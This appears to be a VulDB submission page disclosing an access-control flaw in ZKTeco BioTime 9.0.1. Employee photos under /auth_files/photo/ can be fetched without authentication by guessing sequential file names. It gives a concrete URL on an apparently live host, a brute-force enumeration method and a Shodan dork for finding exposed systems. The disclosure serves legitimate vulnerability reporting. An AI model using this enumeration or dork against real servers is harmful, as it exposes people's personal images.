| Title | ZKteco biotime 9.0.1 Exposure of Access Control List Files to an Unauthorized Control |
|---|
| Description | Vendor of Product: Biotime
Version: 9.0.1
Description:
There is a vulnerability that allows unauthorized access to sensitive images without proper security permissions. This issue arises when a site administrator adds a user or an employee captures their picture. Consequently, an attacker can view all images by guessing the image URLs, effectively circumventing security measures.
Vulnerability Details:
The vulnerability can be exploited by performing a brute force attack on the image URLs. For example, by accessing the following URL pattern:
bash
Copy code
http://time.xmzkteco.com:8097/auth_files/photo/*
An attacker can brute-force the image names, trying variations such as name.jpg with numbers from 0 to 1000 or more, leading to access to images like:
bash
Copy code
http://time.xmzkteco.com:8097/auth_files/photo/109.jpg
This allows an attacker to retrieve all images stored on the server.
Proof of Concept (PoC):
Using the URL pattern mentioned above, an attacker can sequentially access image files without authentication.
Dorks:
Shodan query:
http.title:"biotime"
Reported by: CyberSecurity Center - MOI Iraq |
|---|
| Source | ⚠️ https://gist.githubusercontent.com/whiteman007/f7a85252fed91deff6eb3f20596710b0/raw/b7c8a7f53d3316cfd2da1cae9bcf583d923860b7/biotime%25209.0.1 |
|---|
| User | Cybersecurity Center - MOI Iraq (UID 76965) |
|---|
| Submission | 10/31/2024 17:58 (2 years ago) |
|---|
| Moderation | 11/09/2024 11:21 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 283662 [ZKTeco ZKBio Time 9.0.1 Image File /auth_files/photo/ direct request] |
|---|
| Points | 20 |
|---|